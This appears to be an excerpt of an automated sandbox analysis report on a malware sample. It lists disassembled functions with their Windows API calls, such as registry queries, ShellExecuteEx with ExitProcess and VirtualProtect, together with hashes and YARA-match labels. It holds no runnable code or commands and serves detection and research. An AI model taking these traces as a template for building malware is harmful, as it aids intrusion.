                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                                                  • String ID:
                                                                                  • API String ID: 2533653975-0
                                                                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                                                  • Instruction ID: 7cde1eb3b378e3875c45d5d4fb24c7d189a1aaf557ba540ee9274f261eebea37
                                                                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                                                  • Instruction Fuzzy Hash: F521E7B5D14209ABCF08EFE4D945AEEB7FAFF48300F44856EE406A3250EB345604CBA5
                                                                                  Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00902B70,00000000,00020119,?), ref: 00417E5E
                                                                                  • RegQueryValueExA.ADVAPI32(?,0090A350,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3466090806-0
                                                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                                                  Function 00B18067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B1809E
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B180A5
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 00B180C5
                                                                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 00B180E6
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B180F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3225020163-0
                                                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                  • Instruction ID: c790ae86c3e2e8a3f972420b4421d6cdfc0b9ba8566ac1998e8503848bc4e57f
                                                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                  • Instruction Fuzzy Hash: EB113DB6A84209FBD710DFD4DD4AFABB7B9FB09710F104159F615A7280CB7558018BA1
                                                                                  Function 00B17987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B1799B
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B179A2
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00B17920), ref: 00B179C2
                                                                                  • RegQueryValueExA.ADVAPI32(00B17920,00420AAC,00000000,00000000,?,000000FF), ref: 00B179E1
                                                                                  • RegCloseKey.ADVAPI32(00B17920), ref: 00B179EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3225020163-0
                                                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                  • Instruction ID: e49d03648ba8d1b6caadac0d811968fcb3adc2ff0f535697410e71bdd4af6edf
                                                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                  • Instruction Fuzzy Hash: 8301F4B9A80308BFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281DA7555408F51
                                                                                  Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • StrStrA.SHLWAPI(009099F8,?,?,?,0041140C,?,009099F8,00000000), ref: 0041926C
                                                                                  • lstrcpyn.KERNEL32(0064AB88,009099F8,009099F8,?,0041140C,?,009099F8), ref: 00419290
                                                                                  • lstrlenA.KERNEL32(?,?,0041140C,?,009099F8), ref: 004192A7
                                                                                  • wsprintfA.USER32 ref: 004192C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                  • String ID: %s%s
                                                                                  • API String ID: 1206339513-3252725368
                                                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                                                  Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3466090806-0
                                                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                                                  Function 00B01507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B0151B
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B01522
                                                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B0153E
                                                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B0155C
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B01566
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3225020163-0
                                                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                  • Instruction ID: 4b25d51ec235483ff74c6685c0db203ae134d8f87f2c2be21d7b417d2f9b4bd6
                                                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                  • Instruction Fuzzy Hash: 770131BDA40208BFDB14DFE4DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                                                                  Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041C74E
                                                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                  • __getptd.LIBCMT ref: 0041C765
                                                                                  • __amsg_exit.LIBCMT ref: 0041C773
                                                                                  • __lock.LIBCMT ref: 0041C783
                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                  • String ID:
                                                                                  • API String ID: 938513278-0
                                                                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                                                  Function 00B1C9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00B1C9B5
                                                                                    • Part of subcall function 00B1C206: __getptd_noexit.LIBCMT ref: 00B1C209
                                                                                    • Part of subcall function 00B1C206: __amsg_exit.LIBCMT ref: 00B1C216
                                                                                  • __getptd.LIBCMT ref: 00B1C9CC
                                                                                  • __amsg_exit.LIBCMT ref: 00B1C9DA
                                                                                  • __lock.LIBCMT ref: 00B1C9EA
                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00B1C9FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                  • String ID:
                                                                                  • API String ID: 938513278-0
                                                                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                                  • Instruction ID: 8d6e080c8606a3c93b023685f4022d76e62dd94b0b3d1a59ddc62c785389e241
                                                                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                                  • Instruction Fuzzy Hash: EAF062319802149BD722BBA85407BDD3BD09F00764FD001DAE414AA1D2DB3459C09799
                                                                                  Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • StrCmpCA.SHLWAPI(00000000,009062F0), ref: 0041079A
                                                                                  • StrCmpCA.SHLWAPI(00000000,00906230), ref: 00410866
                                                                                  • StrCmpCA.SHLWAPI(00000000,00906310), ref: 0041099D
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy
                                                                                  • String ID: `_A
                                                                                  • API String ID: 3722407311-2339250863
                                                                                  • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                                                  • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                                                  Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • StrCmpCA.SHLWAPI(00000000,009062F0), ref: 0041079A
                                                                                  • StrCmpCA.SHLWAPI(00000000,00906230), ref: 00410866
                                                                                  • StrCmpCA.SHLWAPI(00000000,00906310), ref: 0041099D
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy
                                                                                  • String ID: `_A
                                                                                  • API String ID: 3722407311-2339250863
                                                                                  • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                                                  • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                                                  Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                                                  • ExitProcess.KERNEL32 ref: 00416755
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                  • String ID: <
                                                                                  • API String ID: 1148417306-4251816714
                                                                                  • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                                                  • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                                                  Function 00B16897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B168CA
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B1698D
                                                                                  • ExitProcess.KERNEL32 ref: 00B169BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                  • String ID: <
                                                                                  • API String ID: 1148417306-4251816714
                                                                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                                                  • Instruction ID: 80c35550d7b299a721c39451d5aed42788afefcbc8336e202ec5522e1f9a8d66
                                                                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                                                  • Instruction Fuzzy Hash: DA313CB1901218ABDB14EB90DD96FDEB7B9AF04300F8051D9F209A6191DF746B88CF5A
                                                                                  Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID: @Jn@$Jn@$Jn@
                                                                                  • API String ID: 544645111-1180188686
                                                                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                                                  Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcatlstrcpy
                                                                                  • String ID: vI@$vI@
                                                                                  • API String ID: 3905823039-1245421781
                                                                                  • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                                                  • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                                                  Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                  • wsprintfW.USER32 ref: 00418D78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                  • String ID: %hs
                                                                                  • API String ID: 659108358-2783943728
                                                                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
